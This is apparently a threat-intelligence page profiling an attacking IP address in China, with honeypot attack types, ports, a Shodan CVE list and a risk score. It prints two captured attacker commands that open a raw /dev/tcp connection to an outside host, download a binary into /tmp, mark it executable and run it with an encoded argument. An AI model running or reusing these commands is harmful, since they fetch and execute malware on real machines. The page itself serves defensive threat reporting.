Active Threat • MEDIUM
8.130.169.123
Country of Origin🇨🇳 China
First Detection3/18/2026
Last Activity3/19/2026
ISPHangzhou Alibaba Advertising Co.,Ltd.
🎯
50
Total Attacks
🔌
2
Ports
📡
2
Attack Types
🦠
3
Malware
Geolocation
- Country
- 🇨🇳 China
- City
- Beijing
- ASN
- AS37963
- ISP
- Hangzhou Alibaba Advertising Co.,Ltd.
Attack Types
ssh_telnet_honeypot
redis_honeypot
Attacked Ports
226379
Associated Malware
Executed Commands
$
nohup bash -c "exec 6<>/dev/tcp/203.57.109.214/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Dn9iNVGCNq && chmod +x /tmp/Dn9iNVGCNq && /tmp/Dn9iNVGCNq E7T8mTOH+6Nwb6T3hzKY+q5obqX/nSCR4KVtbrr/nzmH/6ZtZKL+mDSZ7qZubbr7ni6Y/q1wbKX6kzaZ/6Vqw+6q0SZ4ZHqdr6Y=" &1x$
nohup bash -c "exec 6<>/dev/tcp/203.57.109.214/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/UtGVTF1hq3 && chmod +x /tmp/UtGVTF1hq3 && /tmp/UtGVTF1hq3 I4iGD3y5ongRhZhXQJqFC3Whp34OgIhWQJmHD2GmoXYRhZpdVJ6EDnunt30Ph4ZbWYaFD3a5pX4Ljp5eX5mA6bUXrLt34PSTox2HlJg=" &1xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Ports
223306
Vulnerabilities
CVE-2018-15919CVE-2025-32728CVE-2018-20685CVE-2017-15906CVE-2021-41617CVE-2018-15473CVE-2016-20012CVE-2025-26465CVE-2023-38408CVE-2021-36368CVE-2019-6109CVE-2007-2768CVE-2019-6110CVE-2020-14145CVE-2019-6111CVE-2020-15778CVE-2023-51767CVE-2023-51385CVE-2008-3844CVE-2023-48795
CPEs
cpe:/a:oracle:mysql:5.7.44cpe:/a:openbsd:openssh:7.4
Risk Assessment
45
/100
LowMediumHighCritical